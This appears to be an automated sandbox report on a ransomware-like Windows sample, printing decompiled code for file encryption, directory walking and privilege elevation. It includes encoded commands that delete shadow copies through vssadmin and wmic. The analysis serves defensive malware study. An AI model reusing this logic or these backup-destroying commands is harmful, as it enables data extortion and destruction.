						_t31 =  &_v20;
						__imp__CryptGetKeyParam(_v12, 8,  &_v28, _t31, 0);
						_v32 = _t31;
						 *_a16 = 0xc8;
						_t33 = _a12;
						__imp__CryptEncrypt(_v12, 0, 1, 0, _t33, _a16, _a20);
						_v16 = _t33;
						_v24 = GetLastError();
						if(_v16 == 0) {
							E0FBB36C0(_t34);
						}
					}
					CryptReleaseContext(_v8, 0);
					LeaveCriticalSection(0xfbc2a48);
					return _v16;
				}
				_t36 = GetLastError();
				if(_t36 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t36 != 0) {
					goto L6;
				}
				return 0;
			}

APIs

EnterCriticalSection.KERNEL32(0FBC2A48,?,0FBB38F4,00000000,00000000,00000000,?,00000800), ref: 0FBB666B
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,?,0FBB38F4,00000000,00000000,00000000), ref: 0FBB6691
GetLastError.KERNEL32(?,0FBB38F4,00000000,00000000,00000000), ref: 0FBB669B
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FBB38F4,00000000,00000000,00000000), ref: 0FBB66B7
CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,0FBB38F4,00000000,00000000), ref: 0FBB66EC
CryptGetKeyParam.ADVAPI32(00000000,00000008,0FBB38F4,0000000A,00000000,?,0FBB38F4,00000000), ref: 0FBB670D
CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,0FBB38F4,?,0FBB38F4,00000000), ref: 0FBB6735
GetLastError.KERNEL32(?,0FBB38F4,00000000), ref: 0FBB673E
CryptReleaseContext.ADVAPI32(00000000,00000000,?,0FBB38F4,00000000,00000000), ref: 0FBB675B
LeaveCriticalSection.KERNEL32(0FBC2A48,?,0FBB38F4,00000000,00000000), ref: 0FBB6766

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0FBB6686, 0FBB66AC

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireCriticalErrorLastSection$EncryptEnterImportLeaveParamRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 72144047-1948191093
Opcode ID: 136862998b2e92ad063ee5fd1c3803511fb43bead36e5b205f1028dd225adc6b
Instruction ID: 0753f8703926bca8eac1a93ace11e7b7bc086b009e83f0504a0633770c4962b0
Opcode Fuzzy Hash: 136862998b2e92ad063ee5fd1c3803511fb43bead36e5b205f1028dd225adc6b
Instruction Fuzzy Hash: 4A314175A40309BBDB10DFA1ED45FEE7BB9EB48701F504188FA05A7180DBF9A9119FA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB6DF0 Relevance: 13.6, APIs: 9, Instructions: 109
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0FBB6DF0(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
				void* _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				struct _WIN32_FIND_DATAW _v616;
				void* _t35;
				signed int _t37;
				int _t39;
				signed int _t42;
				void* _t46;
				signed int* _t48;
				WCHAR* _t53;
				intOrPtr* _t54;
				short _t57;
				WCHAR* _t63;
				void* _t67;

				_v24 = __edx;
				_t63 = __ecx;
				"SVWj@h"();
				if(__eax == 0 || E0FBB6BA0(__ecx) != 0) {
					L17:
					__eflags = 0;
					return 0;
				} else {
					E0FBB6D40(__ecx);
					_t53 =  &(_t63[lstrlenW(__ecx)]);
					_v20 = _t53;
					lstrcatW(_t63, "*");
					_t35 = FindFirstFileW(_t63,  &_v616);
					_t57 = 0;
					_v12 = _t35;
					 *_t53 = 0;
					if(_t35 != 0xffffffff) {
						_t54 = _a12;
						do {
							_t37 = lstrcmpW( &(_v616.cFileName), ".");
							__eflags = _t37;
							if(_t37 != 0) {
								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
								__eflags = _t42;
								if(_t42 != 0) {
									lstrcatW(_t63,  &(_v616.cFileName));
									__eflags = _v616.dwFileAttributes & 0x00000010;
									if(__eflags == 0) {
										_v16 =  *_t54;
										_t46 = E0FBB6AB0(_t63,  &_v616, __eflags, _t57, _a4);
										_t67 = _t67 + 8;
										 *_t54 =  *_t54 + _t46;
										asm("adc [ebx+0x4], edx");
										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
										if(__eflags <= 0) {
											if(__eflags < 0) {
												L12:
												_t48 = _a8;
												 *_t48 =  *_t48 + 1;
												__eflags =  *_t48;
											} else {
												__eflags = _v16 -  *_t54;
												if(_v16 <  *_t54) {
													goto L12;
												}
											}
										}
									} else {
										E0FBB6DF0(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
										_t67 = _t67 + 0xc;
									}
									_t57 = 0;
									__eflags = 0;
									 *_v20 = 0;
								}
							}
							_t39 = FindNextFileW(_v12,  &_v616);
							__eflags = _t39;
						} while (_t39 != 0);
						FindClose(_v12);
						goto L17;
					} else {
						return 0xdeadbeaf;
					}
				}
			}

APIs

Part of subcall function 0FBB6780: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0FBB6E06,00000000,?,?), ref: 0FBB6793
Part of subcall function 0FBB6780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0FBB6E06,00000000,?,?), ref: 0FBB685A
Part of subcall function 0FBB6780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0FBB6E06,00000000,?,?), ref: 0FBB6874
Part of subcall function 0FBB6780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0FBB6E06,00000000,?,?), ref: 0FBB688E
Part of subcall function 0FBB6780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0FBB6E06,00000000,?,?), ref: 0FBB68A8

Part of subcall function 0FBB6BA0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FBB6BB2
Part of subcall function 0FBB6BA0: lstrcatW.KERNEL32(00000000,0FBBFF44), ref: 0FBB6BC4
Part of subcall function 0FBB6BA0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FBB6BD2
Part of subcall function 0FBB6BA0: lstrcmpW.KERNEL32(?,0FBBFF48,?,?), ref: 0FBB6BFC
Part of subcall function 0FBB6BA0: lstrcmpW.KERNEL32(?,0FBBFF4C,?,?), ref: 0FBB6C12
Part of subcall function 0FBB6BA0: lstrcatW.KERNEL32(00000000,?), ref: 0FBB6C24
Part of subcall function 0FBB6BA0: lstrlenW.KERNEL32(00000000,?,?), ref: 0FBB6C2B
Part of subcall function 0FBB6BA0: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0FBB6C5A
Part of subcall function 0FBB6BA0: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0FBB6C71
Part of subcall function 0FBB6BA0: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0FBB6C7C
Part of subcall function 0FBB6BA0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0FBB6C9A
Part of subcall function 0FBB6BA0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0FBB6CAF

Part of subcall function 0FBB6D40: VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0FBB6E22,00000000,?,?), ref: 0FBB6D55
Part of subcall function 0FBB6D40: wsprintfW.USER32 ref: 0FBB6D63
Part of subcall function 0FBB6D40: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0FBB6D7F
Part of subcall function 0FBB6D40: GetLastError.KERNEL32(?,?), ref: 0FBB6D8C
Part of subcall function 0FBB6D40: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0FBB6DD8

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FBB6E23
lstrcatW.KERNEL32(00000000,0FBBFF44), ref: 0FBB6E3B
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FBB6E45
lstrcmpW.KERNEL32(?,0FBBFF48,?,?), ref: 0FBB6E7C
lstrcmpW.KERNEL32(?,0FBBFF4C,?,?), ref: 0FBB6E96
lstrcatW.KERNEL32(00000000,?), ref: 0FBB6EA8
lstrcatW.KERNEL32(00000000,0FBBFF7C), ref: 0FBB6EB9
FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0FBB6F1D
FindClose.KERNEL32(00003000,?,?), ref: 0FBB6F2E

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: File$lstrcatlstrcmp$FindFolderPathSpecialVirtual$Alloclstrlen$CreateFirst$CloseErrorFreeLastNextReadSizewsprintf
String ID:
API String ID: 664581897-0
Opcode ID: e55e1c924b6f0d141b216c7f8f4bbec9092c02613feca323f2df5c37a9bed9b4
Instruction ID: 3a555b8cf90f93f9f9ec704f32b7e93ef9779709b22e646535cdff3c1c8f6ff9
Opcode Fuzzy Hash: e55e1c924b6f0d141b216c7f8f4bbec9092c02613feca323f2df5c37a9bed9b4
Instruction Fuzzy Hash: 5F316A71E00219ABCF10AF65EC84AFEBBBAEF45311F4441D9E805E7151EBB4AE518F60

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB34F0 Relevance: 12.1, APIs: 8, Instructions: 79
memorystringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBB34F0(CHAR* __ecx, WCHAR** __edx, WCHAR** _a4) {
				int _v8;
				CHAR* _v12;
				WCHAR** _v16;
				long _t11;
				WCHAR* _t17;
				WCHAR* _t18;
				void* _t23;
				void* _t28;
				int _t29;
				WCHAR** _t30;

				_v16 = __edx;
				_v12 = __ecx;
				_t29 = 0;
				_t11 = lstrlenA(__ecx);
				_v8 = _t11;
				_t23 = VirtualAlloc(0, _t11, 0x3000, 4);
				if(_t23 != 0) {
					if(CryptStringToBinaryA(_v12, 0, 1, _t23,  &_v8, 0, 0) != 0) {
						_t17 = VirtualAlloc(0, 0x100, 0x3000, 4);
						_t30 = _v16;
						 *_t30 = _t17;
						_t18 = VirtualAlloc(0, 0x100, 0x3000, 4);
						_t28 = _t23;
						 *_a4 = _t18;
						if( *_t23 != 0x3b) {
							do {
								_t28 = _t28 + 1;
							} while ( *_t28 != 0x3b);
						}
						 *_t28 = 0;
						wsprintfW( *_t30, L"%S", _t23);
						_t8 = _t28 + 1; // 0x2
						wsprintfW( *_a4, L"%S", _t8);
						_t29 = 1;
					}
					VirtualFree(_t23, 0, 0x8000);
				}
				return _t29;
			}

APIs

lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,0FBB3673,00000000), ref: 0FBB3504
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,0FBB3673,00000000), ref: 0FBB351C
CryptStringToBinaryA.CRYPT32(0FBB3673,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0FBB3535
VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,?,0FBB3673,00000000), ref: 0FBB354C
VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,?,0FBB3673,00000000), ref: 0FBB3561
wsprintfW.USER32 ref: 0FBB3587
wsprintfW.USER32 ref: 0FBB3597
VirtualFree.KERNEL32(00000000,00000000,00008000,?,0FBB3673,00000000), ref: 0FBB35A9

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$wsprintf$BinaryCryptFreeStringlstrlen
String ID:
API String ID: 2885909284-0
Opcode ID: ea10dbf4adc96f07a948c5e8ed1ee1907707d88a611e594d7ff3a6e57bb71bb1
Instruction ID: f2d3db67f4b59905d9d01842de0dd65e87684e555520ab15ce15fa2a121ff3ca
Opcode Fuzzy Hash: ea10dbf4adc96f07a948c5e8ed1ee1907707d88a611e594d7ff3a6e57bb71bb1
Instruction Fuzzy Hash: 4021C371A40218BFEB219AA99C41FAABFECEF45750F1400A5FA04F7281D6F56A018F90

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB45B0 Relevance: 78.8, APIs: 5, Strings: 40, Instructions: 99
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0FBB45B0(void* __eflags) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				short _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				short _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				short* _v176;
				short* _t51;
				WCHAR* _t59;
				void* _t62;
				signed int _t66;
				void* _t69;

				if(E0FBB3CF0(_t62) == 0) {
					_v172 = 0x63005c;
					_v168 = 0x64006d;
					_v8 = 0;
					_t59 =  &_v172;
					_v164 = 0x65002e;
					_t51 =  &_v84;
					_v160 = 0x650078;
					_v156 = 0;
					_v84 = 0x63002f;
					_v80 = 0x760020;
					_v76 = 0x730073;
					_v72 = 0x640061;
					_v68 = 0x69006d;
					_v64 = 0x20006e;
					_v60 = 0x650064;
					_v56 = 0x65006c;
					_v52 = 0x650074;
					_v48 = 0x730020;
					_v44 = 0x610068;
					_v40 = 0x6f0064;
					_v36 = 0x730077;
					_v32 = 0x2f0020;
					_v28 = 0x6c0061;
					_v24 = 0x20006c;
					_v20 = 0x71002f;
					_v16 = 0x690075;
					_v12 = 0x740065;
				} else {
					_v152 = 0x77005c;
					_v148 = 0x650062;
					_t59 =  &_v152;
					_v144 = 0x5c006d;
					_t51 =  &_v120;
					_v140 = 0x6d0077;
					_v136 = 0x630069;
					_v132 = 0x65002e;
					_v128 = 0x650078;
					_v124 = 0;
					_v120 = 0x680073;
					_v116 = 0x640061;
					_v112 = 0x77006f;
					_v108 = 0x6f0063;
					_v104 = 0x790070;
					_v100 = 0x640020;
					_v96 = 0x6c0065;
					_v92 = 0x740065;
					_v88 = 0x65;
				}
				_v176 = _t51;
				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
				if(_t69 != 0) {
					GetSystemDirectoryW(_t69, 0x100);
					lstrcatW(_t69, _t59);
					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);
					asm("sbb edi, edi");
					_t66 =  ~0x20;
				} else {
					_t66 = 0;
				}
				VirtualFree(_t69, 0, 0x8000);
				return _t66;
			}

APIs

Part of subcall function 0FBB3CF0: _memset.LIBCMT ref: 0FBB3D42
Part of subcall function 0FBB3CF0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0FBB3D66
Part of subcall function 0FBB3CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0FBB3D6A
Part of subcall function 0FBB3CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0FBB3D6E
Part of subcall function 0FBB3CF0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0FBB3D95

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 0FBB476F
GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 0FBB4785
lstrcatW.KERNEL32(00000000,0063005C), ref: 0FBB478D
ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 0FBB47A3
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBB47B7

Strings

x, xrefs: 0FBB4606
x, xrefs: 0FBB468C
., xrefs: 0FBB45FE
open, xrefs: 0FBB479C
m, xrefs: 0FBB45E2
n, xrefs: 0FBB46C1
s, xrefs: 0FBB46A9
l, xrefs: 0FBB472C
d, xrefs: 0FBB4700
e, xrefs: 0FBB464B
w, xrefs: 0FBB45EE
/, xrefs: 0FBB4699
c, xrefs: 0FBB462B
e, xrefs: 0FBB474D
a, xrefs: 0FBB461B
a, xrefs: 0FBB4721
, xrefs: 0FBB463B
w, xrefs: 0FBB470B
u, xrefs: 0FBB4742
o, xrefs: 0FBB4623
/, xrefs: 0FBB4737
., xrefs: 0FBB4680
, xrefs: 0FBB46A1
\, xrefs: 0FBB45CE
h, xrefs: 0FBB46F5
p, xrefs: 0FBB4633
, xrefs: 0FBB46EA
t, xrefs: 0FBB46DF
m, xrefs: 0FBB46B9
d, xrefs: 0FBB46C9
i, xrefs: 0FBB45F6
m, xrefs: 0FBB466C
, xrefs: 0FBB4716
\, xrefs: 0FBB4662
a, xrefs: 0FBB46B1
e, xrefs: 0FBB4643
e, xrefs: 0FBB4653
s, xrefs: 0FBB4613
l, xrefs: 0FBB46D4
b, xrefs: 0FBB45D6

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
API String ID: 2684037697-4098772853
Opcode ID: b93e87022c60c3ec84ad45b75faed80bd78f6f8c975f11e3544f8b85bb645f25
Instruction ID: 9c2571b213d6432d9d28e714a34348c99e0a9e9cea64d8813788f5cadd8cb5da
Opcode Fuzzy Hash: b93e87022c60c3ec84ad45b75faed80bd78f6f8c975f11e3544f8b85bb645f25
Instruction Fuzzy Hash: 8A412AB0548380DFE360CF119849B9BBFE6BB85B49F10491CEA985A291C7F6854CCF97

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB3DB0 Relevance: 77.1, APIs: 9, Strings: 35, Instructions: 109
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBB3DB0(void* __ecx, void* __edx, void* __eflags) {
				char _v1020;
				short _v1028;
				char _v1532;
				short _v1540;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				intOrPtr _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1584;
				intOrPtr _v1588;
				intOrPtr _v1592;
				intOrPtr _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				intOrPtr _v1608;
				intOrPtr _v1612;
				intOrPtr _v1616;
				short _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				intOrPtr _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				intOrPtr _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				short _v1676;
				char _v1680;
				int _t54;
				struct HWND__* _t62;
				long _t66;
				void* _t76;
				void* _t78;
				void* _t80;

				_t78 = __ecx;
				_t54 = E0FBB3CF0(__edx);
				if(_t54 != 0) {
					_t54 = E0FBB3C70();
					if(_t54 == 0) {
						_v1676 = 0x770025;
						_v1672 = 0x6e0069;
						_v1668 = 0x690064;
						_v1664 = 0x250072;
						_v1660 = 0x73005c;
						_v1656 = 0x730079;
						_v1652 = 0x650074;
						_v1648 = 0x33006d;
						_v1644 = 0x5c0032;
						_v1640 = 0x620077;
						_v1636 = 0x6d0065;
						_v1632 = 0x77005c;
						_v1628 = 0x69006d;
						_v1624 = 0x63;
						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
						_v1620 = 0x720070;
						_v1616 = 0x63006f;
						_v1612 = 0x730065;
						_v1608 = 0x200073;
						_v1604 = 0x610063;
						_v1600 = 0x6c006c;
						_v1596 = 0x630020;
						_v1592 = 0x650072;
						_v1588 = 0x740061;
						_v1584 = 0x200065;
						_v1580 = 0x630022;
						_v1576 = 0x64006d;
						_v1572 = 0x2f0020;
						_v1568 = 0x200063;
						_v1564 = 0x740073;
						_v1560 = 0x720061;
						_v1556 = 0x200074;
						_v1552 = 0x730025;
						_v1548 = 0x22;
						wsprintfW( &_v1028,  &_v1620, _t78);
						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
						 *_t76 = 0x3c;
						 *(_t76 + 4) = 0x40;
						_t62 = GetForegroundWindow();
						_t80 = 0;
						 *(_t76 + 8) = _t62;
						_v1680 = 0x750072;
						_v1676 = 0x61006e;
						_v1672 = 0x73;
						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;
						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;
						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;
						 *(_t76 + 0x18) = 0;
						 *(_t76 + 0x1c) = 0;
						 *(_t76 + 0x20) = 0;
						while(1) {
							_t66 = ShellExecuteExW(_t76);
							if(_t66 != 0) {
								break;
							}
							_t80 = _t80 + 1;
							if(_t80 < 0x64) {
								continue;
							}
							_t54 = VirtualFree(_t76, _t66, 0x8000);
							goto L6;
						}
						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
						CloseHandle( *(_t76 + 0x38));
						ExitProcess(0);
					}
				}
				L6:
				return _t54;
			}

APIs

Part of subcall function 0FBB3CF0: _memset.LIBCMT ref: 0FBB3D42
Part of subcall function 0FBB3CF0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0FBB3D66
Part of subcall function 0FBB3CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0FBB3D6A
Part of subcall function 0FBB3CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0FBB3D6E
Part of subcall function 0FBB3CF0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0FBB3D95

Part of subcall function 0FBB3C70: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0FBB3CA0

ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0FBB3E5D
wsprintfW.USER32 ref: 0FBB3F27
VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 0FBB3F3B
GetForegroundWindow.USER32 ref: 0FBB3F50
ShellExecuteExW.SHELL32(00000000), ref: 0FBB3FB1
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBB3FC4
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0FBB3FD6
CloseHandle.KERNEL32(?), ref: 0FBB3FDF
ExitProcess.KERNEL32 ref: 0FBB3FE7

Strings

, xrefs: 0FBB3EDA
a, xrefs: 0FBB3EFB
m, xrefs: 0FBB3ECF
s, xrefs: 0FBB3EF0
e, xrefs: 0FBB3E3D
o, xrefs: 0FBB3E78
e, xrefs: 0FBB3E81
2, xrefs: 0FBB3E2D
r, xrefs: 0FBB3E05
a, xrefs: 0FBB3EB1
y, xrefs: 0FBB3E15
, xrefs: 0FBB3EA1
s, xrefs: 0FBB3F75
l, xrefs: 0FBB3E99
s, xrefs: 0FBB3E89
i, xrefs: 0FBB3DF4
p, xrefs: 0FBB3E68
e, xrefs: 0FBB3EB9
\, xrefs: 0FBB3E0D
n, xrefs: 0FBB3F6D
d, xrefs: 0FBB3DFD
w, xrefs: 0FBB3E35
t, xrefs: 0FBB3F06
c, xrefs: 0FBB3EE5
r, xrefs: 0FBB3F65
c, xrefs: 0FBB3E55
t, xrefs: 0FBB3E1D
%, xrefs: 0FBB3F11
c, xrefs: 0FBB3E91
", xrefs: 0FBB3F1C
r, xrefs: 0FBB3EA9
%, xrefs: 0FBB3DE7
\, xrefs: 0FBB3E45
", xrefs: 0FBB3EC4
m, xrefs: 0FBB3E25

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
API String ID: 561366689-3790645798
Opcode ID: cd75ebcb3e96e70f40612d9b8f8369e8293a1d616ef6b8b941073d7bc391fb49
Instruction ID: 62795232cbc195567a1adfa6db74cebc4de3d7da612a5e5bdd627a7983a22e6f
Opcode Fuzzy Hash: cd75ebcb3e96e70f40612d9b8f8369e8293a1d616ef6b8b941073d7bc391fb49
Instruction Fuzzy Hash: 585168B0408340DFE3208F51D448B9ABFF9FF85759F004A1DEA989A251D7FA9158CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB37B0 Relevance: 66.8, APIs: 32, Strings: 6, Instructions: 320
memorystringwindowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0FBB37B0(WCHAR* __ecx, void* __edx, void* __eflags) {
				long _v8;
				void* _v12;
				long _v16;
				long _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				void _v40;
				void _v44;
				signed int _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				short _v80;
				int _v84;
				char _v88;
				char _v104;
				char _v108;
				char _v140;
				char _v388;
				void* _t96;
				void* _t97;
				struct HWND__* _t99;
				void* _t101;
				void* _t107;
				long _t124;
				long _t125;
				long _t128;
				WCHAR* _t145;
				void* _t147;
				void* _t149;
				void* _t151;
				WCHAR* _t162;
				void* _t163;
				void* _t164;
				void _t165;
				void* _t166;
				long _t168;
				void* _t173;
				void* _t175;
				void* _t176;
				void* _t177;

				_t145 = __ecx;
				_t166 = __edx;
				_v52 = __ecx;
				SetFileAttributesW(_t145, GetFileAttributesW(__ecx) & 0xfffffffe);
				_v20 = 0;
				_v32 = 0;
				_t151 = _t166;
				E0FBB6500(_t151, 0, 0,  &_v20,  &_v32);
				_t162 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
